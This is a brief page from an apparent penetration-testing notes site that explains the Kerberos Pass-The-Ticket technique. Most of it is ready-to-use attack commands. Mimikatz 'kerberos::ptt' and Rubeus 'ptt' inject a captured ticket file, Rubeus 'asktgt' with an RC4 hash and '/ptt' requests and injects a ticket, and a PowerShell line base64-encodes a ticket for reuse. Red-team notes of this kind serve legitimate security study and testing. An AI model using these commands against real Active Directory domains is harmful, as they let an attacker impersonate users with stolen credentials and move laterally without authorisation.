Pass The Ticket

About

Pass-The-Ticket in contrast of Pass-The-Hash and Overpass-The-Hash use a ticket to gain access to the TGS and then for service.

Mimikatz

kerberos::ptt "C:\Users\rio\Desktop\Mimikatz\[0;7f830]-5-2-43f10000-rio@krbtgt-corp.local.kirbi"

Rubeus

Using Hash

Rubeus.exe asktgt /domain:amogus.kek /user:rio /rc4:1293uo1uwfoi1hw081 /ptt

Unlike command for Overpass-The-Hash, here we are using /ptt to do both Overpass-The-Hash and Pass-The-Ticket simultaneously. But that only works if we give /hash: instead of ticket

Using Ticket

Rubeus.exe ptt /ticket:[0;7f830]-5-2-43f10000-rio@krbtgt-corp.local.kirbi

Using Encoded Ticket

[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;7f830]-5-2-43f10000-v17@krbtgt-corp.local.kirbi"))
Rubeus.exe ptt /ticket:LETSIMAGINETHISISOURBASE64ENCODEDKERBEROSTICKET
PreviousOverpass The HashNextnoPAC

Last updated